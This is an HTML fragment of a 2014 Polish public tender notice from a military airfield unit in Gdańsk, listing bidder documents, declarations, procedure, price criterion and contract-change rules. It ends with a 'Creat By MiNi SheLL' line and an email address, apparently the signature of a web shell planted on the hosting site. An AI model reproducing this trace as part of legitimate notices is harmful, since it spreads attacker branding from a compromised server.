<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający żąda, żeby w składanej ofercie Wykonawca przedstawił następujące oświadczenia i dokumenty:

1. Oświadczenie Wykonawcy wynikające z treści art. 22 ust. 1 ustawy Pzp, że:
a)	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	posiada wiedzę  i doświadczenie,
c)	dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d)	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.  Oświadczenie, że Wykonawca zapoznał się ze specyfikacją istotnych warunków zamówienia wraz z załącznikami, a w szczególności z projektem umowy załączonym do SIWZ i przyjmuje zawarte w niej warunki bez zastrzeżeń oraz że zapoznał się i uzyskał na własną odpowiedzialność i ryzyko wszelkie istotne informacje o warunkach, w których będzie realizowany przedmiot zamówienia i uwzględnił je w kalkulacji ceny oferty.
3.  Oświadczenie, że Wykonawca złożył ofertę na warunkach określonych przez Zamawiającego na realizację przedmiotu zamówienia i w przypadku wyboru jego oferty jako najkorzystniejszej zobowiązuje się wykonać przedmiot zamówienia zgodnie z dokumentacja projektową, SIWZ i złożoną ofertą.
4.  Oświadczenie Wykonawcy o znajomości i stosowaniu przepisów Ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (tekst jednolity Dz. U. z 2010 r. nr 182 poz. 1228) łącznie z przepisami wykonawczymi do ww. ustawy.
5.  Oświadczenie Wykonawcy o znajomości o odpowiedzialności karnej za naruszenie przepisów Ustawy z dnia 5 sierpnia 2010 r. O ochronie informacji niejawnych (tekst jednolity Dz. U. z 2010 r. Nr 182 poz. 1228) łącznie z przepisami wykonawczymi do ww. ustawy.
6. Oświadczenie, że Wykonawca otrzymał od Zamawiającego niezbędne dane i założenia 
do wykonania przedmiotu umowy oraz zapoznał się z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót, przedmiarami robót, SIWZ na wykonanie robót budowlanych oraz odpowiedziami udzielanymi na etapie wyboru WRB.
7.  Oświadczenie Wykonawcy, że nie pozostaje z WRB w takim stosunku prawnym lub faktycznym, że może to budzić uzasadnione wątpliwości co do ich bezstronności.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje zmiany postanowień warunków umownych, niezależnie od podstaw do zmian przewidzianych w innych postanowieniach niniejszej umowy tj. w §4 ust. 4 z następujących powodów:
1)	działania siły wyższej mające wpływ na terminowość wykonania przedmiotu umowy,
2)	wystąpienia okoliczności, których strony nie były w stanie przewidzieć do czasu zawarcia umowy pomimo zachowania należytej staranności, jeśli są one niezależne od Wykonawcy,
2.	W przypadku wystąpienia którejkolwiek z okoliczności wymienionych ust. 1 pkt  1 termin realizacji przedmiotu zamówienia może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia jego wykonywania w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. 
3.	Wszelkie zmiany zostaną wprowadzone na poniższych zasadach:
1) zmiany w umowie mogą być dokonywane jedynie za zgodą obu stron;
2) zmiany w umowie mogą być dokonane jedynie na piśmie w formie aneksów pod rygo-rem nieważności;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.17tol-gdansk.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.17tol-gdansk.com.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2014 godzina 10:30, miejsce: 17 Terenowy Oddział Lotniskowy, ul. M.Konopnickiej  13, 80-240 Gdańsk, otwarcie ofert odbędzie się o godzinie 11:00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. W przypadku zaistnienia okoliczności, o których mowa w art. 24 ust. 1 i 2 ustawy Pzp, Zamawiający wykluczy Wykonawcę biorącego udział w postępowaniu o udzielenie zamówienia, a złożoną przez niego ofertę uzna za odrzuconą. Zamawiający zawiadomi równocześnie Wykonawców, którzy zostaną wykluczeni z postępowania, podając uzasadnienie faktyczne i prawne, z zastrzeżeniem art. 92 ust. 1 pkt. 3 ustawy Pzp.
2. Zamawiający na podstawie art. 36a ust. 2 zastrzega obowiązek osobistego wykonania zamówienia przez Inspektora nadzoru zadania. Zastrzeżenie wykonania usługi nie będzie skuteczne jeżeli Wykonawca powoła się na zasoby innego podmiotu, za zasadach określonych w art. 26 ust. 2b w celu wykazania spełnienia warunków, o których mowa w art. 22 ust.1.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com